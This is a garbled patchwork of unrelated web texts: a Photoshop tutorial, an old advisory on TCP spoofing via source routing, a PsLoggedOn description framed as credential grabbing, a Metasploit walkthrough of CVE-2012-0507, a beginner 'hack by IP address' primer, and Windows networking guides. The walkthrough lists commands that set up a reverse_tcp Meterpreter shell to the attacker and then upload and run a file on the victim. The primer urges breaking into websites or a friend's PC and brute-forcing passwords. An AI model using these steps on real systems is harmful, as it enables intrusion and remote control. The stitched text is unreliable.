Once again I'll turn off my grid temporarily with Ctrl+' (Win) / Command+' (Mac) so we can see the image itself more easily. Your image should now look something like this:

The vertical and horizontal strips are now created.

Step 11: Select All The Strip Intersection Points

We have our vertical and horizontal strips, but all it really looks like at the moment is that we have a bunch of black squares covering our image. We need to create the illusion that the strips are weaving above and below each other. To do that, we need to select the areas where the vertical and horizontal strips intersect. Before we do that though, press Ctrl+' (Win) / Command+' (Mac) to turn off the grid if you haven't already, since we no longer need it. Then, hold down your Ctrl (Win) / Command (Mac) key and click directly on the "Horizontal Strips" layer's layer mask thumbnail:

Hold down "Ctrl" (Win) / "Command" (Mac) and click directly on the "Horizontal Strips" layer mask thumbnail.

This will load the horizontal selections back into the image:

The horizontal selections are now loaded once again in the image.

Then hold down Shift+Ctrl+Alt (Win) / Shift+Command+Option (Mac) and click directly on the "Vertical Strips" layer mask thumbnail:

Hold down "Shift+Ctrl+Alt" (Win) / "Shift+Command+Option" (Mac) and click directly on the "Vertical Strips" layer mask.

This will do two things: One, it will load the vertical selections back in to the image, and two, it will tell Photoshop to keep the selection around only the areas where the horizontal and vertical selections intersect. Everything else becomes deselected:

Step 12: Save The Selection

Before we go any further, we need to save this selection. To do that, go up to the Select menu at the top of the screen and choose Save Selection. When the "Save Selection" dialog box appears, simply click OK in the top right corner to exit out of it:

Step 13: Deselect Every Other Square Selection

With your Rectangular Marquee Tool still active, hold down your Alt (Win) / Option (Mac) key and drag a selection around every other square selection. This will deselect the selections you drag around. Continue dragging around every other square selection to deselect it until only half of the original square selections remain. Your image should look like this:

Step 14: Copy The Selection To A New Layer

Click on the "Horizontal Strips" layer thumbnail in the Layers palette to select it. Then press Ctrl+J (Win) / Command+J (Mac) to copy the selected areas to a new layer. You won't see anything happen to the image itself, but if you look in the Layers palette, you'll see a new layer named "Layer 1" added between the "Horizontal Strips" and "Vertical Strips" layers which contains our square selected areas:

Press "Ctrl+J" (Win) / "Command+J" (Mac) to copy the selected areas to a new layer.

Step 15: Create A Clipping Mask

With the new layer selected, go up to the Layer menu at the top of the screen and choose Create Clipping Mask. You can also use the keyboard shortcut Ctrl+Alt+G (Win) / Command+Option+G (Mac). Either way "clips" the new layer to the layer below it. We can't see any difference in the image itself, but in the Layers palette, we can see that the new layer is now indented to the right which tells us that it's being clipped by the layer below it:

Hold "Ctrl" (Win) / "Command" (Mac) and click on the "Horizontal Strips" layer's layer mask thumbnail.

Step 16: Reload The Saved Selection

Let's bring back the selection we saved a moment ago, and we can do that easily using the keyboard shortcut Ctrl+Alt+4 (Win) / Command+Option+4 (Mac):

Reload the saved selection.

Step 17: Deselect The Opposite Square Selections

With the Rectangular Marquee Tool still selected, once again hold down your Alt (Win) / Option (Mac) key and drag around every other square selection to deselect it. This time though, you want to keep the square selections you deleted the first time we did this and deselect all the ones you kept, so that when you're done, your image looks like this:

Hold down "Alt" (Win) / "Option" (Mac) and drag selections around the square selections to deselect them. Keep the ones you deselected previously and deselect the ones you kept.

Step 18: Copy The Selection To A New Layer

Click on the "Vertical Strips" layer at the top of the Layers palette to select it, then press Ctrl+J (Win) / Command+J (Mac) to copy the selected areas to a new layer. Again, we won't see anything happen to the image itself, but the Layers palette shows us a new layer named "Layer 2" above the "Vertical Strips" layer which contains our selected square areas:

Step 19: Create A Clipping Mask

Just as we did a moment ago, either go up to the Layer menu and choose Create Clipping Mask or press Ctrl+Alt+G (Win) / Command+Option+G (Mac) to create a clipping mask. We can now see the new layer indented to the right telling us that it is being clipped by the "Vertical Strips" layer below it:

Step 20: Add An Outer Glow Layer Style

With the top layer still selected, click on the Layer Styles icon at the bottom of the Layers palette:

Click on the "Layer Styles" icon.

Select Outer Glow from the list of Layer Styles that appears:

Select the "Outer Glow" layer style.

This brings up the "Layer Style" dialog box set to the "Outer Glow" options in the middle. We're going to turn our "glow" into a shadow, and to do that, we need to change the Blend Mode at the top from Multiply. We also don't want yellow as our shadow color, so click on the color swatch just below the word "Noise", which brings up Photoshop's Color Picker, and select black as the color. Click OK once you've selected black to exit out of the Color Picker. Lower the Opacity value to about 60% so the shadow isn't quite as dark and intense. Finally, in the "Elements" section in the middle of the dialog box, raise the Size value to around 40 pixels:

You may need to adjust the "Size" value depending on the size and resolution of the image you're using. Click OK when you're done to exit out of the Layer Style dialog box. Your image should now look something like this. We're almost done:

Step 21: Copy And Paste The Layer Style Onto "Layer 1"

All that's left to do now is apply the exact same Outer Glow layer style to "Layer 1". Rather than adding another Outer Glow and having to change all the settings in the options again, we can simply copy our layer style from "Layer 2" and paste it onto "Layer 1". To do that, go up to the Layer menu at the top of the screen, choose Layer Style, and then choose Copy Layer Style. Then click on "Layer 1" in the Layers palette to select it, go back up to the Layer menu, choose Layer Style once again, and this time, choose Paste Layer Style.
As soon as you do that, the Outer Glow, along with all the settings we just changed, is pasted onto "Layer 1", and the "interweaving photo strips" effect is complete:

Copy and paste the Outer Glow layer style from "Layer 2" onto "Layer 1" to complete the effect.

And there we have it!

Simple TCP Spoofing Attack

SPOOFING Attack

Over the past few years TCP sequence number prediction attacks have become a
real threat against unprotected networks, taking advantage of the inherent
trust relationships present in many network installations. TCP sequence
number prediction attacks have most commonly been implemented by opening a
series of connections to the target host, and attempting to predict the
sequence number which will be used next. Many operating systems have
therefore attempted to solve this problem by implementing a method of
generating sequence numbers in unpredictable fashions. This method does
not solve the problem.

This advisory introduces an alternative method of obtaining the initial
sequence number from some common trusted services. The attack presented here
does not require the attacker to open multiple connections, or flood a port
on the trusted host to complete the attack. The only requirement is that
source routed packets can be injected into the target network with fake
source addresses.

This advisory assumes that the reader already has an understanding of how
TCP sequence number prediction attacks are implemented.

The impact of this advisory is greatly diminished due to the large number of
organizations which block source routed packets and packets with addresses
inside of their networks. Therefore we present the information as more of
a 'heads up' message for the technically inclined, and to re-iterate that
the randomization of TCP sequence numbers is not an effective solution
against this attack.

Technical Details
~~~~~~~~~~~~~~~~~

The problem occurs when particular network daemons accept connections
with source routing enabled, and proceed to disable any source routing
options on the connection. The connection is allowed to continue, however
the reverse route is no longer used. An example attack can launched against
the in.rshd daemon, which on most systems will retrieve the socket options
via getsockopt() and then turn off any dangerous options via setsockopt().

An example attack follows.

Host A is the trusted host
Host B is the target host
Host C is the attacker

Host C initiates a source routed connection to in.rshd on host B, pretending
to be host A.

Host C spoofing Host A         <SYN>    --> Host B in.rshd

Host B receives the initial SYN packet, creates a new PCB (protocol
control block) and associates the route with the PCB. Host B responds,
using the reverse route, sending back a SYN/ACK with the sequence number.

Host C spoofing Host A <-- <SYN/ACK>       Host B in.rshd

Host C responds, still spoofing host A, acknowledging the sequence number.
Source routing options are not required on this packet.

Host C spoofing Host A         <ACK>    --> Host B in.rshd

We now have an established connection, the accept() call completes, and
control is now passed to the in.rshd daemon. The daemon now does IP
options checking and determines that we have initiated a source routed
connection. The daemon now turns off this option, and any packets sent
thereafter will be sent to the real host A, no longer using the reverse
route which we have specified. Normally this would be safe, however the
attacking host now knows what the next sequence number will be. Knowing
this sequence number, we can now send a spoofed packet without the source
routing options enabled, pretending to originate from Host A, and our
command will be executed.

In some conditions the flooding of a port on the real host A is required
if larger ammounts of data are sent, to prevent the real host A from
responding with an RST. This is not required in most cases when performing
this attack against in.rshd due to the small ammount of data transmitted.

It should be noted that the sequence number is obtained before accept()
has returned and that this cannot be prevented without turning off source
routing in the kernel.

As a side note, we're very lucky that TCP only associates a source route with
a PCB when the initial SYN is received. If it accepted and changed the ip
options at any point during a connection, more exotic attacks may be possible.
These could include hijacking connections across the internet without playing
a man in the middle attack and being able to bypass IP options checking
imposed by daemons using getsockopt(). Luckily *BSD based TCP/IP stacks will
not do this, however it would be interesting to examine other implementations.

Impact
~~~~~~

The impact of this attack is similar to the more complex TCP sequence
number prediction attack, yet it involves fewer steps, and does not require
us to 'guess' the sequence number. This allows an attacker to execute
arbitrary commands as root, depending on the configuration of the target
system. It is required that trust is present here, as an example, the use
of .rhosts or hosts.equiv files.

Solutions
~~~~~~~~~

The ideal solution to this problem is to have any services which rely on
IP based authentication drop the connection completely when initially
detecting that source routed options are present. Network administrators
and users can take precautions to prevent users outside of their network
from taking advantage of this problem. The solutions are hopefully already
either implemented or being implemented.

1. Block any source routed connections into your networks
2. Block any packets with internal based address from entering your network.

Network administrators should be aware that these attacks can easily be
launched from behind filtering routers and firewalls. Internet service
providers and corporations should ensure that internal users cannot launch
the described attacks. The precautions suggested above should be implemented
to protect internal networks.

Example code to correctly process source routed packets is presented here
as an example. Please let us know if there are any problems with it.
This code has been tested on BSD based operating systems.

One critical concern is in the case where TCP wrappers are being used. If
a user is relying on TCP wrappers, the above fix should be incorporated into
fix_options.c. The problem being that TCP wrappers itself does not close
the connection, however removes the options via setsockopt(). In this case
when control is passed to in.rshd, it will never see any options present,
and the connection will remain open (even if in.rshd has the above patch
incorporated). An option to completely drop source routed connections will
hopefully be provided in the next release of TCP wrappers. The other option
is to undefine KILL_IP_OPTIONS, which appears to be undefined by default.
This passes through IP options and allows the called daemon to handle them
accordingly.

Disabling Source Routing
~~~~~~~~~~~~~~~~~~~~~~~~

We believe the following information to be accurate, however it is not
guaranteed.

--- Cisco

To have the router discard any datagram containing an IP source route option
issue the following command:

no ip source-route

This is a global configuration option.

--- NetBSD

Versions of NetBSD prior to 1.2 did not provide the capability for disabling
source routing. Other versions ship with source routing ENABLED by default.
We do not know of a way to prevent NetBSD from accepting source routed packets.
NetBSD systems, however, can be configured to prevent the forwarding of packets
when acting as a gateway.

To determine whether forwarding of source routed packets is enabled,
issue the following command:

# sysctl net.inet.ip.forwarding
# sysctl net.inet.ip.forwsrcrt

The response will be either 0 or 1, 0 meaning off, and 1 meaning it is on.

Forwarding of source routed packets can be turned off via:

# sysctl -w net.inet.ip.forwsrcrt=0

Forwarding of all packets in general can turned off via:

# sysctl -w net.inet.ip.forwarding=0

--- BSD/OS

and 1 meaning it is on. If source routing has been turned on, turn off via:

# sysctl -w net.inet.ip.sourceroute=0

--- Linux

Linux by default has source routing disabled in the kernel.

--- Solaris 2.x

Ships with source routing enabled by default. Solaris 2.5.1 is one of the
few commercial operating systems that does have unpredictable sequence
numbers, which does not help in this attack.

We know of no method to prevent Solaris from accepting source routed
connections, however, Solaris systems acting as gateways can be prevented
from forwarding any source routed packets via the following commands:

# ndd -set /dev/ip ip_forward_src_routed 0

You can prevent forwarding of all packets via:

# ndd -set /dev/ip ip_forwarding 0

These commands can be added to /etc/rc2.d/S69inet to take effect at bootup.

--- SunOS 4.x

We know of no method to prevent SunOS from accepting source routed
connections, however a patch is availible to prevent SunOS systems from
forwarding source routed packets.

This patch is availible at:

To configure SunOS to prevent forwarding of all packets, the following
command can be issued:

The first command turns off packet forwarding in /dev/mem, the second in
/vmunix.

--- HP-UX

HP-UX does not appear to have options for configuring an HP-UX system to
prevent accepting or forwarding of source routed packets. HP-UX has IP
forwarding turned on by default and should be turned off if acting as a
firewall. To determine whether IP forwarding is currently on, the following
command can be issued:

# adb /hp-ux
ipforwarding?X      <- user input
ipforwarding:
ipforwarding: 1
#

A response of 1 indicates IP forwarding is ON, 0 indicates off. HP-UX can
be configured to prevent the forwarding of any packets via the following
commands:

# adb -w /hp-ux /dev/kmem
ipforwarding/W 0
ipforwarding?W 0
^D
#

--- AIX

AIX cannot be configured to discard source routed packets destined for itself,
however can be configured to prevent the forwarding of source routed packets.
IP forwarding and forwarding of source routed packets specifically can be
turned off under AIX via the following commands:

To turn off forwarding of all packets:

# /usr/sbin/no -o ipforwarding=0

To turn off forwarding of source routed packets:

# /usr/sbin/no -o nonlocsrcroute=0

Note that these commands should be added to /etc/rc.net

If shutting off source routing is not possible and you are still using
services which rely on IP address authentication, they should be disabled
immediately (in.rshd, in.rlogind). in.rlogind is safe if .rhosts and
/etc/hosts.equiv are not used.

How To Get User Name and Password (Remote Pc With IP))

After you get the IP addresses of some computers on my network. You can use command line tool like PsExec, PsLogged which can take the IP Address as input and find out the username of the currently logged in user. Here that one of that tool, PsLoggedOn.

You can determine who is using resources on your local computer with the "net" command ("net session"), however, there is no built-in way to determine who is using the resources of a remote computer. In addition, NT comes with no tools to see who is logged onto a computer, either locally or remotely. PsLoggedOn is an applet that displays both the locally logged on users and users logged on via resources for either the local computer, or a remote one. If you specify a user name instead of a computer, PsLoggedOn searches the computers in the network neighborhood and tells you if the user is currently logged on.

PsLoggedOn's definition of a locally logged on user is one that has their profile loaded into the Registry, so PsLoggedOn determines who is logged on by scanning the keys under the HKEY_USERS key. For each key that has a name that is a user SID (security Identifier), PsLoggedOn looks up the corresponding user name and displays it. To determine who is logged onto a computer via resource shares, PsLoggedOn uses the NetSessionEnum API. Note that PsLoggedOn will show you as logged on via resource share to remote computers that you query because a logon is required for PsLoggedOn to access the Registry of a remote system.

CVE-2012-0507 is a vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. A malicious Java application or applet could use this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.

    Security News: This vulnerability affects Windows, Mac and Linux operating systems. Last month, Flashback malware infect more than 600,000 Mac computers by exploiting this vulnerability. Recently, The INSS , The Amnesty International UK websites injected with malicious code that exploit the CVE-2012-0507.

I am going to demonstrate this vulnerability with VirtualBox. I have setup two Virtual Machines namely "Target" and "BT5". I have installed XP 2 in the Target and Backtrack 5 R2 in the 'BT5'.

(need help in configuring the VM?, read this: setup PenTesting Lab).

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and Type "msfupdate". This will update the Metasploit Framework(MSF) with the latest exploits and Payloads. As CVE-2012-0507 is latest vulnerability, you have to update the MSF before proceeding further.

Part III :
Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:

Step 1:
Open the Terminal and type "msfconsole". This will bring the Metasploit console , here you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray" . This command will use the java_atomicreferencearray.rb module for the attack.

Now type "show options" to display the which settings are available and/or required for this specific module.

Now type "set SRVPORT 80".

Step 3: Set Payload
Type "show payloads", this will displays the list of payloads. We are going to use the 'reverse_tcp' payload. This payload will get reverse tcp connection from the Target to PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.

set LHOST [IP_address] : In order to get reverse connection, we have to set our IP in the LHOST.

open the Terminal and type "ifconfig". This will display the IP info of our PenTesting Machine. The IP will be "192.168.56.x".   For instance, let me say the ip is 192.168.56.10.

Now Type in the msfconsole as "set LHOST 192.168.56.10".

Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine.

Step 1:

Type "exploit" in the msfconsole. This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: http://192.168.56.10). Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.

step 2:

Open the Firefox/IE in the Target machine.
Enter "http://192.168.56.10".
It loads nothing but exploit will run in the background.
Step 3:
Open the BT5 machine, it will display the following output:

Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control with the Target.

Step 4:Upload files
Yeeeh..! we got backdoor to the Target machine, now we can run any commands in the Target.

For Example, Typing 'sysinfo' will display the system information.

You can also upload and execute your own executable files in the Target machine.

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.

Security Tips:
Update your JRE to the latest version.

Literally, hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house and hijacking the precious things. Among all the hacking, hacking via IP address is one of the most common yet powerful beginning.

You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.

Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.

Well, both of the hacking has the same process. Let’s summarize what we must do.

    Confirm the website or a computer you want to hack.
    Find or trace their IP address.
    Make sure that IP address is online
    Scan for open ports
    Check for venerable ports
    access through the port
    Brute-force username and password

Now let me describe in brief in merely basic steps that a child can understand it.

To enable Remote Desktop, you must have administrative rights on the computer you want to use as the host (e.g., the computer to which you will connect from a remote location), which must be running one of the following versions of Windows:

    Windows 7 Professional, Enterprise, or Ultimate
    Windows Vista Business, Enterprise, or Ultimate
    Windows XP Professional

Before making a remote connection, first enable the Remote Desktop feature on your host computer, and then install Remote Desktop Connection client software on your client computer.
Enabling Remote Desktop

To enable the Remote Desktop feature on your host (Windows) computer:

    From the Start menu, select Control Panel (or Settings, and then Control Panel). Double-click System.

    In Windows 7 and Vista, click Remote settings. In the "Remote Desktop" section, select one of the two options to allow connections from other computers.

    In Windows XP, select the Remote tab. Select Allow users to connect remotely to this computer.
    To choose which users will have remote access, in 7 and Vista, click Select Users... , or in XP, click Select Remote Users... . Typically, all administrators of the computer will have access by default. Each user must have a password before you can allow remote access.

    When you are finished, click OK. Your computer will now be able to accept incoming Remote Desktop connections.

Installing Remote Desktop Connection client software

You can download the Remote Desktop Connection (RDC) client for Mac OS X from Microsoft Mactopia.
Opening a connection

    Depending upon your network configuration and system requirements, you may first have to establish a VPN connection to your host computer's network.

    At Indiana University:
        You must first establish a VPN connection if:

            You are off campus, connecting to a computer on campus.
            You are on campus, connecting to your home computer in campus or Greek housing.

In this article I will walk you through the Advanced TCP/IP settings dialog and its relevant tabs, so that you can better understand what each option is used for and how to configure it.
Windows 2003 comes with a number of new features for TCP/IP, including support for IP Version 6, automatically determining the Interface and Gateway metric, and the Alternate configuration tab which allows you to specify an alternate IP Address to use in absence of a DHCP server (before APIPA kicks in).
The Advanced TCP/IP dialog will allow you to configure settings relative to DNS, WINS and specify multiple IP Addresses and Gateways (which can even be used if you only have one network card on the machine).
To bring up the Advanced TCP/IP Settings dialog, simply right click the desired connection from the Network Connections folder, and choose properties to open the Properties dialog of the selected connection. Now select Internet Protocol (TCP/IP) from the list and click the Properties button. This will open the Internet Protocol (TCP/IP) Properties dialog. Next, click the Advanced button and up pops the Advanced TCP/IP Settings dialog with four tabs to choose from:
IP Settings – Allows you to add more IP Addresses or change the routing properties of the network card.
DNS – Allows you to set how the TCP/IP connection uses DNS.
WINS – Allows you to set how the TCP/IP connection uses WINS for computers that can’t access Active Directory.
Options – Allows you to set TCP/IP Filtering and specify which ports will be used for TCP/IP communication.

Advanced TCP/IP Settings – The IP Settings Tab

The IP addresses box at the top allows you to assign additional IP Addresses to a single network card. This is useful if you are hosting multiple websites on the same web server and want to give each its own IP Address for example.
Simply click the Add button to add an IP Address and Subnet Mask. Click Edit to modify the currently selected item and Remove to delete the currently selected item from the list.

The Default gateways box in the middle is used if you want the network connection to use multiple default gateways. Click the Add button to add a Default gateway and assign it a Metric value. A metric value is the cost of a specific route. Cost can reflect speed, reliability and number of hops. The route with the lowest metric value is used, so if you have two Default Gateways set up, one with a metric of 10 and the other with a metric of 20, the one with 10 will be chosen first. Leaving the metric at automatic means that the route metric for this default gateway will be calculated automatically, and the fastest route chosen.
Note: If you fire up the Command Prompt and type “route print” with no quotes, the IP Routing table is displayed with the metric value listed as one of the properties of each IP Address and its associations.
The Edit and Remove buttons in the Default gateways box do exactly the same as for the IP addresses box (explained above).
At the bottom of the IP Settings tab you can set whether you want the Interface to have a specific metric or to be assigned one automatically. By default this option is checked. Uncheck it if you wish to input an Interface metric value of your choice.

Advanced TCP/IP Settings – The DNS Tab

The "DNS server addresses, in order of use box" at the top of the DNS tab is used to list the IP Addresses of the DNS Servers that will be used for name resolution. These servers are ordered and used in priority, meaning if one server does not work then it will move to the next one down the list. To set the order of IP Addresses, select an IP Address and press the up and down button on the right hand side.
It is important to keep in mind that TCP/IP will not move on to the next server if it fails to resolve the request. It will only move to the next server if the first server it tries is unavailable (perhaps down for maintenance or in the middle of a reboot).
Append primary and connection specific DNS suffixes, and Append parent suffixes of the primary DNS suffix are enabled by default. These options are used for resolution of unqualified names.
The first option is used to resolve unqualified names using the parent domain. For example, if you had a computer name of “andrew” and a parent domain called ztabona.com it would resolve to andrew.ztabona.com. The query would fail if andrew.ztabona.com does not exist in the parent domain. The second option is used to resolve unqualified names using the parent-child domain hierarchy. A DNS query will move one step up the domain hierarchy if it fails at the current level. It will do this until it reaches the root of the hierarchy.
If you have an environment which consists of a client machine forming part of multiple domains then you can add a bunch of domains to the Append these DNS suffixes (in order) list so these will be searched as part of the DNS query, instead of using the parent domain.

The textbox on the right of the DNS suffix for this connection is used to explicitly set a DNS suffix that will override any other setting already specified for this connection.
Register this connection’s addresses in DNS will register all this connection’s IP Addresses in DNS under the computer’s FQDN. Using this connection’s DNS suffix in DNS registration will register all IP Addresses for this connection in DNS under the parent domain.

Advanced TCP/IP Settings – The WINS Tab

The WINS tab is used to specify WINS related settings such as the list of WINS servers to be used for NETBIOS name to IP resolution, the LMHOSTS file to be used as an alternate means of lookups and the NETBIOS settings for the network connection.
Pre-Windows 2000 machines and applications use NETBIOS to IP name resolution. If you have a Windows 2003 machine that acts as a file or print server and any client machines want to communicate with it, you will have to make use of NETBIOS. It is unlikely that you will have no pre-Windows 2000 machines on your network but if you do, then go ahead and disable NETBIOS over IP; you’ll save on memory and CPU consumption and free up resources.
Use the "WINS addresses, in order of use box" at the top to add the WINS servers you want the system to use for IP to name resolution. Press the Add button for a small dialog box to appear waiting for you to enter the IP Address of the WINS server. Use the Edit and Remove buttons to modify or delete a selected item respectively. If you have more than one WINS server in the list, press the up and down arrow buttons to adjust the priority of which servers will be queried first. If one server is not available then the next one down will be used, and so on and so forth.

Check the Enable LMHOSTS lookup checkbox so that if WINS cannot resolve a name then the local LMHOSTS file will be used. The LMHOSTS file can be found in \WINDOWS\system32\drivers\etc. It goes by the name of lmhosts.sam and can be modified in a text editor. Entries are placed at the bottom of the file and when used, the listed IP Addresses are matched against a specified host name. If you already have an LMHOSTS file defined on another machine on the network, use the Import LMHOSTS button to select this file and import it to the local machine.
The NETBIOS settings at the bottom allow you to explicitly define how NETBIOS will be used on the system. Choose Default if you want the DHCP server to assign the NETBIOS setting, Enable NETBIOS over TCP/IP if you use a static IP Address or the DHCP Server does not give NETBIOS settings, and Disable NETBIOS over TCP/IP if you do not use NETBIOS or WINS on your network.

Advanced TCP/IP Settings – The Options Tab (TCP/IP Filtering)

The Options tab allows you to configure TCP/IP Filtering settings; you can define which ports or protocols are permitted. Select the Permit Only radio button and use the Add button to add TCP/UDP port numbers or a protocol version to the respective list. If you permit traffic only from a defined set of ports, all other traffic will be dropped.
